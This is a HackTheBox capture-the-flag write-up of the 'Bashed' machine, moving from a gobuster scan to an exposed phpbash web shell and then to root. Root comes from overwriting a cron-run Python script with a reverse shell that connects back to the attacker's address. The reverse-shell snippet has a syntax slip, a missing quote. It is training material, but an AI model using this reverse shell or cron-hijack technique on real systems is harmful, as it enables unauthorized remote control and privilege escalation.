Bashed

![f5864aceeefb1e406e4d5b393c89a357.png](68757d919950447c8a2723837615b2b4.png) ### Port Scanning, General Enumeration and Access (Nmap, Gobuster) Initial scan showed that the only port available is 80 (HTTP) ![bd01656345ddccc0469e64d7205c7abb.png](a79611f0fb504d2c95e48ad41bf64257.png) ![521eab003e68c7b9b8c6a3165dbc004f.png](25a5af46355a4665aff1c3c562a5abbd.png) Looks like a pretty neat tool, but not a lot to go on. `gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php` ![d266d9b40f7d37741133d816aff27fa1.png](926805d2c0704027b5127fd161f124f3.png) `/dev`? ![e5b7c370abcac44325316c5f01353d1b.png](374d569c5b8544ae9d52f43225a8d392.png) found the phpbash thing! ![04cfb0c08f8a0ae2506dc5ea7ee84763.png](a0955a0b22924187939aebd235886bb9.png) ![dcd444ca9a402a810ff2c121f584cee2.png](04f9bd6f06fe467fa56f7a7e2cc9c1d8.png) --- ### Privesc (php reverse shell, python, cronjobs) We can upload files to the `/uploads` directory in the webroot ![af313696df01e0877c0ea89ed433c427.png](0400838e70144b8eae257ac5820ddad8.png) Let's get a real shell ![4fd58a133be0cd2272fdb3ea3535e5cd.png](6a01483f603b47ab839df4876f952621.png) `python3 -c 'import pty; pty.spawn("/bin/bash")'` ![c7e9f1b1827264ad792abbc841f4f553.png](c483f76f0a054e3fb5bc65db38e5b76d.png) Easy enough to switch to `scriptmanager` `sudo -u scriptmanager /bin/bash` There's a scripts folder owned by `scriptmanager` ![1c2c10bf0ecdf6a2801ed07ec302db62.png](f59cdcfdc0884bc8b8fe0f0e38a86c5e.png) ![a54454783a3b57526f0f6f5b93f0c0c9.png](fb017495d2524ecfa59dfe3430afa544.png) Interesting, the python script is ours but text file is owned by root? ![e670daa3f4ef1ab447080a2c41002f16.png](5e05db701753482f846bcd7b28e075ed.png) I see, so the script runs and creates that file. ![cc2964236f7d97d6178a37695e7b97ad.png](3fa0f82b6b8a424dbefdacbf740f2032.png) Moving the old `test.txt` to `test.txt.bak` and re-running the script we can see that the new `test.txt` is owned by us. That leads me to believe that something with root privs ran that prior. Maybe a cronjob? Let's test ![ed04a1a4e3e0ecfeef9462cd91c806b7.png](39b94ffd44b24eb5bb7f06e45aa19ae4.png) It's back and with root privs! Let's give this boring old `test.py` some fangs. ```Python import socket,subprocess,os,pty s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.18,4445)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash") ``` I created the new `test.py` on my machine and transferred it over. Started a listener and... ![7d8618f99e679389e24dacb08142d003.png](b3cf254ad72549119b33e1520bb5ab13.png) ![be41b9c05ca645b4855a45b650ee1279.png](4a95bcc9d69f47838d361634b7e1239a.png) --- Back to [[HackTheBox Index]] Tags: #gobuster #htb #cron #python #hackthebox #box_writeups Related: